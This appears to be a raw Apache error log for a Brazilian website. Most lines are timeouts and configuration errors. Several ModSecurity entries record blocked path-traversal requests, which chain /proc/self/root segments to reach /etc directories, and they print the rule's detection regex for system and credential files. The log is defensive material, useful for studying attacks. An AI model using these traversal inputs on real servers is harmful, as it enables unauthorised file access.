[Thu Mar 19 01:37:19.137514 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35792] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:37:44.453823 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:38:06.336159 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.228.61:55080] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt9rgkwaGbbGflqUZBmewAAAM0"]
[Thu Mar 19 01:38:07.123059 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36934] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:38:30.125880 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:38:51.306779 2026] [mime_magic:error] [pid 14269:tid 140411691570944] (70014)End of file found: [client 57.141.18.82:40666] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:38:52.132462 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38016] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:38:53.357482 2026] [mime_magic:error] [pid 17887:tid 140411658000128] (70014)End of file found: [client 57.141.18.69:40824] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:39:11.034188 2026] [:error] [pid 27403:tid 140411733534464] [client 74.7.243.128:53262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt97hkFeYa1D6dYQnCiUAAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:39:15.775402 2026] [mime_magic:error] [pid 14269:tid 140411607643904] (70014)End of file found: [client 57.141.18.99:41280] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:39:16.516849 2026] [mime_magic:error] [pid 26799:tid 140411624429312] (70014)End of file found: [client 57.141.18.59:41204] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:39:17.129783 2026] [proxy_fcgi:error] [pid 31803:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:39:31.164744 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.243.128:50898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt-A_-YZRR_7pZ7nDJD6gAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:39:33.764975 2026] [mime_magic:error] [pid 17653:tid 140411624429312] (70014)End of file found: [client 57.141.18.52:41588] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:39:44.149854 2026] [proxy_fcgi:error] [pid 27403:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39254] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:40:12.025795 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39948] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:40:14.655410 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.244.43:47224] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt-LuyqAr6etmhZHNoaygAAAEY"]
[Thu Mar 19 01:40:36.321798 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:41:01.401833 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:41:20.514869 2026] [core:alert] [pid 27403:tid 140411666392832] [client 57.141.18.10:44670] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:41:25.121328 2026] [proxy_fcgi:error] [pid 19093:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41802] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:41:51.085828 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:42446] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:41:54.870174 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:36992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt-ksdf6f5d65gmYZQoIAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:42:13.070144 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43046] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:42:35.575555 2026] [core:alert] [pid 15826:tid 140411540502272] [client 57.141.18.93:46760] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:42:40.125772 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43696] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:42:41.899776 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:35232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt-wQkwaGbbGflqUZBnIQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:42:58.409816 2026] [mime_magic:error] [pid 19093:tid 140411565680384] (70014)End of file found: [client 57.141.18.99:46480] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:43:09.129797 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44468] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:43:12.086698 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.228.61:47634] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt-4AbLMZ6AikZjR9UTiwAAAAc"]
[Thu Mar 19 01:43:35.129805 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45178] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:43:36.163070 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.243.128:43980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt--BkFeYa1D6dYQnCi0QAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 01:43:57.157794 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45786] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:44:12.171823 2026] [core:alert] [pid 17653:tid 140411590858496] [client 57.141.18.80:49196] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 01:44:17.540766 2026] [mime_magic:error] [pid 27403:tid 140411607643904] (70014)End of file found: [client 57.141.18.101:49656] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:44:19.125811 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:46320] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:44:43.331479 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:45:07.157816 2026] [proxy_fcgi:error] [pid 19093:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47532] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:45:17.707229 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.244.43:60572] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abt_XeoXxyEfFpUF8f_IuQAAAUs"]
[Thu Mar 19 01:45:30.153807 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48094] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:45:57.121800 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48866] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:46:25.137784 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:46:53.761780 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50396] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:46:54.967910 2026] [:error] [pid 19093:tid 140411624429312] [client 74.7.243.128:41568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt_vl_V7PWP6ixUYl5y4gAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:47:02.638906 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:36206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abt_xhkFeYa1D6dYQnCjTgAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:47:18.129793 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51154] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:47:43.121796 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:48:11.129993 2026] [proxy_fcgi:error] [pid 27403:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:52640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:48:13.631009 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.228.61:44354] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuADeoXxyEfFpUF8f_JMQAAAUU"]
[Thu Mar 19 01:48:37.161811 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:48:57.083791 2026] [mime_magic:error] [pid 19093:tid 140411708356352] (70014)End of file found: [client 57.141.18.62:57942] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:48:59.181905 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54174] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:49:00.226561 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 57.141.18.6:58032] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:49:13.905840 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.243.128:36206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuASRkFeYa1D6dYQnCjowAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:49:18.552498 2026] [mime_magic:error] [pid 31803:tid 140411649607424] (70014)End of file found: [client 57.141.18.99:58594] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:49:22.981805 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:34054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuAUsdf6f5d65gmYZQpFwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 01:49:23.133789 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:49:30.243105 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:60736] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuAWsdf6f5d65gmYZQpHQAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 01:49:46.121789 2026] [proxy_fcgi:error] [pid 27403:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:49:51.791487 2026] [:error] [pid 27293:tid 140411574073088] [client 74.7.244.43:43382] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuAb_-YZRR_7pZ7nDJFTQAAA9Q"]
[Thu Mar 19 01:50:10.993778 2026] [proxy_fcgi:error] [pid 27403:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56146] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:50:31.641137 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:33646] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuAl_-YZRR_7pZ7nDJFcgAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 01:50:36.004894 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56824] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:50:59.141890 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57492] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:51:24.125831 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58162] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:51:27.125823 2026] [mime_magic:error] [pid 15826:tid 140411599251200] (70014)End of file found: [client 57.141.18.73:34104] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 01:51:51.138820 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 01:52:04.396980 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:39622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuA8wbLMZ6AikZjR9UUywAAABc"], referer: 